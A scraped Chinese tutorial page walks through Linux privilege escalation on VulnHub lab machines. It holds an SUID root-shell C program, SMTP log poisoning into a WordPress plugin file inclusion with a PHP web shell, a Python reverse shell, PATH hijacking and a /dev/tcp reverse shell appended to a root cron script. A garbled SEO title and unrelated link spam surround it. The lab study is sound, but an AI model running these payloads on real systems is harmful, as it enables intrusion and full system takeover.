当前位置: 首页 > news >正文

微信小程序外联网站wordpress 无法创建目录.

微信小程序外联网站,wordpress 无法创建目录.,个人 备案 多个网站,美乐乐网站首页如何修改一、演示案例-Linux系统提权-Web&普通用户-SUID-NFS安全 NFS是一种基于TCP/IP 传输的网络文件系统协议,通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源。 https://www.virtualbox.org/wiki/Downloads https://www.vuln…

一、演示案例-Linux系统提权-Web&普通用户-SUID-NFS安全

NFS是一种基于TCP/IP 传输的网络文件系统协议,通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源。

https://www.virtualbox.org/wiki/Downloads

https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/

前提条件:NFS端口服务开启和web或用户权限进行利用

1、信息收集

nmap 192.168.1.6

http://192.168.1.6/file.php?file=/etc/passwd

2、NFS服务利用

showmount -e 192.168.1.6

//用于显示NFS(网络文件系统)服务器上所有已导出的文件系统列表的命令

mkdir nfs  //本地kali创建一个nfs目录

mount -t nfs 192.168.1.6:/mnt/nfs ./nfs  //把目标的/mnt/nfs目录跟kali本地的nfs目录进行同步

3、配合SUID提权

find / -perm -u=s -type f 2>/dev/null  //查看本地suid权限的文件

两种解决方式:1、找一个与目标版本相似的系统,上传这个系统的find 2、找一个与目标版本相似的系统,自己写一个c语言去调用命令

getroot.c

#include<stdlib.h>

#include<unistd.h>

int main()

{

setuid(0);

system("id");

system("/bin/bash");

}

gcc getroot.c -o getroot

//把getroot.c编译为getroot可执行文件

cp getroot /root/nfs  //复制bash到挂载目录下

chmod +777 getroot //赋予777权限

chmod +s getroot   //赋予suid权限

find / -perm -u=s -type f 2>/dev/null //使用查看当前suid权限看看是否有/mnt/nfs/getroot文件

cd /mnt/nfs     //目标机来到/mnt/nfs目录下

./getroot       //目标机执行getroot文件触发shell

python -c 'import pty; pty.spawn("/bin/bash")'  //python起一个交互式终端

getroot.c

#include<stdlib.h>

#include<unistd.h>

int main()

{

setuid(0);

system("id");

system("whoami");  //whoami就是要执行的命令

}

二、演示案例-Linux系统提权-普通用户-SUID-PATH变量

复现环境:symfonos: 1 ~ VulnHub

前提条件:存在SUID的应用中能执行额外命令加用户权限

1、信息收集

smbclient -L 192.168.139.153

2、权限获取

smbclient //192.168.139.153/anonymous

smbclient //192.168.139.153/helios -U helios

helios \ qwerty

3、漏洞利用

wpscan --url http://192.168.139.153/h3l105/ --plugins-detection aggressive

searchsploit mail masta 1.0  //利用searchsploit搜索mail漏洞或者百度关键字

http://192.168.139.153/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

telnet 192.168.139.153 25

MAIL FROM: MALABIS

RCPT TO: helios

data

<?php system($_GET['shell']); ?>

.

QUIT

http://192.168.139.153/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.139.128",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4、权限提升

python -c 'import pty;pty.spawn("/bin/bash")'  //python起一个交互终端

find / -perm -u=s -type f 2>/dev/null  //查看当前环境suid

strings /opt/statuscheck  //查看这个文件的内容,寻找有用信息

cd /tmp

echo "/bin/sh" > curl

chmod 777 curl

export PATH=/tmp:$PATH

echo $PATH

/opt/statuscheck

三、演示案例-Linux系统提权-Web&普通用户-Cron计划任务

复现环境:Jarbas: 1 ~ VulnHub

1、信息收集

http://192.168.139.152/access.html

2、权限获取

http://192.168.139.152:8080/

3、权限提升

cat /etc/crontab //查看当前服务器的计划任务

ls -lia /etc/script/CleaningScript.sh  //查看对该任务文件的权限

echo "/bin/bash -i >& /dev/tcp/192.168.139.141/66 0>&1" >> /etc/script/CleaningScript.sh //把反弹shell命令写进这个文件里

cat /etc/script/CleaningScript.sh   //查看脚本内容

http://www.yayakq.cn/news/611930/

相关文章:

  • 新乡定制网站建设公司广东网站备案
  • 青岛公司网站建设公司短视频剪辑培训班速成
  • 湖北省荆门市城乡建设网站wordpress游戏代练主题
  • 禁止下载app网站石家庄网页设计人才招聘
  • 做爰片在线看网站网站开发需要准备什么软件
  • 网站什么时候备案好没有网站可以做百度快照怎么做
  • 什么样的网站利于百度优化关键词优化排名公司
  • 百度霸屏推广四川网站建设和优化
  • 网站要背代码?做玻璃瓶的网站
  • 企业站seowordpress换行代码
  • 张家界网站建设公司福州优化搜索引擎
  • 无锡网站制作工具百度关键词推广工具
  • 关于网站建设交易流程的描述一句话手机网站内容规划
  • 傻瓜式建网站天眼网
  • 贵阳网站建设多少钱响应式网站弊端
  • 南宁网站建设哪家专业口味王网站建设的设计方案
  • 从seo角度谈网站建设logo设计大赛网站
  • 网站开发需要的资源门户网站建设管理总则
  • 高端外贸网站建设服装加氢站个公司好
  • 企业免费网站推广公司wordpress深入理解
  • 永久开源的免费建站系统淘宝客手机网站怎么做
  • 成都商城类网站设计wordpress怎样连接数据库连接
  • 门户网站建设公司咨询新版wordpress编辑
  • 做网站推广员工网站建设业务饱和了吗
  • 快乐彩网站做政务服务网站建设标准
  • 龙华营销型网站制作网页界面设计体会
  • 江苏炒股配资网站开发成都创软科技的口碑
  • 网页小游戏的网站常州网站建设最易
  • ps做网站网站 留言板 制作
  • 网站开发的特点wordpress修改数据库密码忘记